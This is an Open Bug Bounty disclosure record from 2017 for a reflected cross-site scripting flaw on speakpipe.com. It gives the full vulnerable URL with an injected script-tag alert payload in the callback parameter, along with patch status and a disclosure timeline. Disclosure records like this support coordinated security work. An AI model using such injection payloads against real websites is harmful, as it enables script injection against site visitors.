speakpipe.com XSS vulnerability

2017-06-06T18:10:00
ID OBB:245261
Type openbugbounty
Reporter djrootdz
Modified 2017-11-26T14:43:00

Description

Vulnerable URL:
https://www.speakpipe.com/widget_log?action_code=allow_button_problem&callback;=jQuery16407747073988430202_1485569276886%27%22()%26%25%3Ctest%3E%3CScRiPt%20%3Ealert(%27OPENBUGBOUNTY%27)%3C/ScRiPt%3E&flash;_version=24.0.0&ref;_url=https://www.speakpipe.com/halloween-voicemail&speakpipe;_id=3658&speakpipe;_public_token=53hffuwiq8i0acip4i2rqwsva0r0k0qb&visitor;_token=ZLAzxSIfZGB7jjlM&_=1485569372682
Details:

Description| Value
---|---
Patched:| Yes, at 26.11.2017
Latest check for patch:| 26.11.2017 14:43 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 125061
VIP website status:| No
Check speakpipe.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 June, 2017 18:10 GMT
Generic security notifications sent to website owner| 6 June, 2017 18:12 GMT
Notification sent to subscribers (without technical details)| 6 June, 2017 22:17 GMT
Vulnerability details disclosed by researcher| 4 July, 2017 18:16 GMT
Vulnerability patched by the website owner| 26 November, 2017 14:43 GMT